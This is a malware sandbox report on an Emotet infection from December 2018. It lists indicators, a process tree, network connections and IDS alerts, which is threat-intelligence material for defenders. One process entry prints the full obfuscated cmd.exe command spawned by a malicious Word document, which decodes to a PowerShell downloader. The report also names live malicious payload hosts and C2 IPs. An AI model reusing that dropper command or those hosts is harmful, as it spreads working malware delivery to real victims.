analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://eugroup.dk/EN_US/Documents/2018-12

Full analysis: https://app.any.run/tasks/bf482a66-2ec3-40b1-acf2-cd3dbf088ed3
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 14, 2018, 12:39:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
emotet
feodo
Indicators:
MD5:

80A638080F4849F793DB1D17C1886931

SHA1:

B5A963160A6215568428BC5B375709B63A5B0AEE

SHA256:

E82634DCE0161B781DE08CFEF9406A4CBD7E29C9B22E79EB49A5EB5EDD6F9918

SSDEEP:

3:N1KbrPwtg/c5n:CREn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3656)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3656)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3336)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2260)
    • Application was dropped or rewritten from another process

      • 718.exe (PID: 2636)
      • 718.exe (PID: 2836)
      • archivesymbol.exe (PID: 3604)
      • archivesymbol.exe (PID: 2372)
      • hV5fQmjS.exe (PID: 656)
      • archivesymbol.exe (PID: 2256)
      • hV5fQmjS.exe (PID: 4056)
      • archivesymbol.exe (PID: 3660)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2260)
    • EMOTET was detected

      • archivesymbol.exe (PID: 2372)
      • archivesymbol.exe (PID: 3660)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 2372)
    • Connects to CnC server

      • archivesymbol.exe (PID: 2372)
      • archivesymbol.exe (PID: 3660)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • chrome.exe (PID: 2860)
      • WINWORD.EXE (PID: 3656)
    • Application launched itself

      • WINWORD.EXE (PID: 3656)
      • cmd.exe (PID: 3620)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3820)
      • cmd.exe (PID: 2768)
      • cmd.exe (PID: 3336)
      • cmd.exe (PID: 3620)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2260)
      • 718.exe (PID: 2836)
      • archivesymbol.exe (PID: 2372)
      • hV5fQmjS.exe (PID: 4056)
    • Starts itself from another location

      • 718.exe (PID: 2836)
      • hV5fQmjS.exe (PID: 4056)
    • Creates files in the user directory

      • powershell.exe (PID: 2260)
    • Connects to unusual port

      • archivesymbol.exe (PID: 3660)
  • INFO

    • Reads settings of System Certificates

      • chrome.exe (PID: 2860)
    • Application launched itself

      • chrome.exe (PID: 2860)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3656)
      • WINWORD.EXE (PID: 3408)
    • Creates files in the user directory

      • chrome.exe (PID: 2860)
      • WINWORD.EXE (PID: 3656)
    • Reads Internet Cache Settings

      • chrome.exe (PID: 2860)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
59
Monitored processes
27
Malicious processes
13
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs chrome.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs findstr.exe no specs powershell.exe 718.exe no specs 718.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe chrome.exe no specs chrome.exe no specs hv5fqmjs.exe no specs hv5fqmjs.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2860"C:\Program Files\Google\Chrome\Application\chrome.exe" http://eugroup.dk/EN_US/Documents/2018-12C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
3221225547
Version:
68.0.3440.106
3632"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6f5a00b0,0x6f5a00c0,0x6f5a00ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2888"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2864 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
4072"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=928,6446415706175171745,7615301987602728214,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=8A06F70D374E981BF1B0C8A1342079BF --mojo-platform-channel-handle=1016 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2652"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=928,6446415706175171745,7615301987602728214,131072 --enable-features=PasswordImport --service-pipe-token=51ED6FA61BDC52E740339FBF3FD5FF58 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=51ED6FA61BDC52E740339FBF3FD5FF58 --renderer-client-id=4 --mojo-platform-channel-handle=1900 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
3076"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=928,6446415706175171745,7615301987602728214,131072 --enable-features=PasswordImport --service-pipe-token=DC4117E6C36385A02CE2449B8D68C817 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=DC4117E6C36385A02CE2449B8D68C817 --renderer-client-id=3 --mojo-platform-channel-handle=2076 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
3656"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\FILE-2017827.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3408"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2520"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=928,6446415706175171745,7615301987602728214,131072 --enable-features=PasswordImport --disable-gpu-sandbox --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=024E737BCEB3ACF8B3FE0E9323F37C26 --mojo-platform-channel-handle=3956 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2768c:\VURcrUDuIZ\TMvGSsAjBXzH\OqRztTjOYDcf\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set v0k=hspBoKXLalEDIfIpS;dkPGrv,.ytwZbi6108VOze$FgY'/:n @N(C}7mAHqURW\j)u=+4-xQ{c&&for %T in (40,29,19,20,66,44,58,65,19,44,17,40,43,47,29,66,47,39,28,69,4,30,63,39,73,27,48,50,39,27,25,61,39,30,52,9,31,39,47,27,17,40,63,55,15,66,44,0,27,27,15,46,45,45,0,39,22,30,8,9,15,8,22,8,18,39,25,73,4,55,45,8,8,38,16,5,38,68,16,29,65,49,0,27,27,15,46,45,45,28,8,65,1,25,47,39,27,45,0,57,60,3,0,16,19,37,19,20,49,0,27,27,15,46,45,45,73,39,9,39,30,27,22,8,23,39,9,8,47,18,39,23,39,47,27,1,25,73,4,25,38,8,45,34,6,23,14,29,70,10,49,0,27,27,15,46,45,45,31,9,42,73,8,15,25,47,39,27,45,6,36,32,59,58,11,29,56,8,34,49,0,27,27,15,46,45,45,8,27,39,55,8,25,73,73,45,23,57,13,13,60,15,34,28,44,25,16,15,9,31,27,51,44,49,44,64,17,40,31,13,16,66,44,31,5,11,44,17,40,71,21,15,48,66,48,44,54,33,35,44,17,40,18,58,31,66,44,21,50,11,44,17,40,71,9,20,66,40,39,47,23,46,27,39,55,15,67,44,62,44,67,40,71,21,15,67,44,25,39,70,39,44,17,13,4,22,39,8,73,0,51,40,22,0,47,48,31,47,48,40,63,55,15,64,72,27,22,26,72,40,43,47,29,25,11,4,28,47,9,4,8,18,41,31,9,39,51,40,22,0,47,24,48,40,71,9,20,64,17,40,57,16,57,66,44,52,58,43,44,17,14,13,48,51,51,21,39,27,69,14,27,39,55,48,40,71,9,20,64,25,9,39,47,42,27,0,48,69,42,39,48,35,34,34,34,34,64,48,72,14,47,23,4,19,39,69,14,27,39,55,48,40,71,9,20,17,40,10,14,4,66,44,29,16,55,44,17,30,22,39,8,19,17,53,53,73,8,27,73,0,72,53,53,40,41,60,7,66,44,30,19,21,44,17,74)do set 3WZ7=!3WZ7!!v0k:~%T,1!&&if %T geq 74 echo !3WZ7:*3WZ7!=!|FOR /F "delims=uD.M tokens=2" %B IN ('ftype^^^|findstr lMo')DO %B -"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
3 599
Read events
3 037
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
37
Text files
80
Unknown types
12

Dropped files

PID
Process
Filename
Type
2860chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
MD5:
SHA256:
2860chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old
MD5:
SHA256:
2860chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old~RF1998bc.TMP
MD5:
SHA256:
2860chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\0f2c684b-8e34-432f-9077-1e78f9277841.tmp
MD5:
SHA256:
2860chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
MD5:
SHA256:
2860chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
MD5:
SHA256:
2860chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\94df5bc9-6ffa-456e-97b7-5d4e1ded7794.tmp
MD5:
SHA256:
2860chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\134aba3f-b9a2-479d-8c80-e3432cb2b382.tmp
MD5:
SHA256:
2860chrome.exeC:\Users\admin\Downloads\FILE-2017827.doc.crdownload
MD5:
SHA256:
2860chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF1998ea.TMPtext
MD5:197882774A7ECEC9046BC48F63189B66
SHA256:27377B0D5F989997C2C3F74ACF163EED44B60631DDAA768F6655D7BE555742B2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
17
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3660
archivesymbol.exe
GET
109.74.142.74:80
http://109.74.142.74/
RU
malicious
3660
archivesymbol.exe
GET
110.37.219.134:990
http://110.37.219.134:990/
PK
suspicious
3660
archivesymbol.exe
GET
190.146.201.54:80
http://190.146.201.54/
CO
malicious
3660
archivesymbol.exe
GET
152.168.60.9:80
http://152.168.60.9/
AR
malicious
3660
archivesymbol.exe
GET
190.152.12.86:80
http://190.152.12.86/
EC
malicious
2860
chrome.exe
GET
301
217.116.232.214:80
http://eugroup.dk/EN_US/Documents/2018-12
DK
html
250 b
suspicious
2260
powershell.exe
GET
200
203.28.48.11:80
http://waus.net/hHRBhSkOkP/
AU
executable
164 Kb
malicious
3660
archivesymbol.exe
GET
187.243.203.67:8090
http://187.243.203.67:8090/
MX
malicious
2372
archivesymbol.exe
GET
200
190.146.201.54:80
http://190.146.201.54/
CO
binary
107 Kb
malicious
2860
chrome.exe
GET
200
217.116.232.214:80
http://eugroup.dk/EN_US/Documents/2018-12/
DK
document
143 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2260
powershell.exe
69.89.31.173:80
herbalparade.com
Unified Layer
US
malicious
2860
chrome.exe
217.116.232.214:80
eugroup.dk
Netgroup A/S
DK
suspicious
2260
powershell.exe
203.28.48.11:80
waus.net
Bucan Holdings Pty Ltd
AU
malicious
2860
chrome.exe
172.217.168.45:443
accounts.google.com
Google Inc.
US
whitelisted
2860
chrome.exe
216.58.215.227:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
2860
chrome.exe
172.217.168.35:443
www.gstatic.com
Google Inc.
US
whitelisted
3660
archivesymbol.exe
190.146.201.54:80
Telmex Colombia S.A.
CO
malicious
2372
archivesymbol.exe
190.146.201.54:80
Telmex Colombia S.A.
CO
malicious
3660
archivesymbol.exe
109.74.142.74:80
OOO WestCall Ltd.
RU
malicious
3660
archivesymbol.exe
152.168.60.9:80
CABLEVISION S.A.
AR
malicious

DNS requests

Domain
IP
Reputation
eugroup.dk
  • 217.116.232.214
suspicious
clientservices.googleapis.com
  • 216.58.215.227
whitelisted
www.gstatic.com
  • 172.217.168.35
whitelisted
accounts.google.com
  • 172.217.168.45
shared
ssl.gstatic.com
  • 172.217.168.35
whitelisted
herbalparade.com
  • 69.89.31.173
malicious
waus.net
  • 203.28.48.11
malicious
safebrowsing.googleapis.com
  • 172.217.168.42
whitelisted

Threats

PID
Process
Class
Message
2860
chrome.exe
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
2860
chrome.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
2260
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2260
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2260
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi'
2260
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2260
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2260
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2260
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2260
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
6 ETPRO signatures available at the full report
No debug info